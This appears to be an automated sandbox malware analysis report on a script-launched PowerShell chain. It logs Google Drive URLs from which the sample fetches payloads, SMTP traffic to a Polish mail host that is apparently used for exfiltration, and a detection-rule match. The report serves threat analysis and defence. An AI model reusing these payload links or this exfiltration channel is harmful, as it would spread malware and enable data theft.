              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: wab.pdb source: fMNDB.exe, fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficTCP traffic: 192.168.2.7:49710 -> 195.128.154.10:587
              Source: Joe Sandbox ViewASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficTCP traffic: 192.168.2.7:49710 -> 195.128.154.10:587
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: mail.fiszebrandt.pl
              Source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftg
              Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.1276080884.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280184708.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277659585.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277953257.0000029F535BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280909884.0000029F51634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
              Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280909884.0000029F51634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabI
              Source: wscript.exe, 00000000.00000003.1280184708.0000029F535AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277953257.0000029F535AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277770471.0000029F535AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a79a7483e6
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fiszebrandt.pl
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.fiszebrandt.pl
              Source: powershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/0
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPz
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B58726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: wab.exe, 00000016.00000002.3747608661.0000000007540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1l
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_M
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mp
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpg
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-W
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WW
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWe
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeR
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeRe
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReX
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXP
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPO
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOE
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEB
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBm
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmL
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLy
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyi
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3M
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MS
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MSc
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScO
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2y
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B58726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2ydP
              Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2ydXR
              Source: wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B589C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2904249486.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download
              Source: wab.exe, 00000016.00000003.2904249486.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=downloadtd
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B589C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download
              Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49709 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_7004.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5228
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5228
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5228Jump to behavior
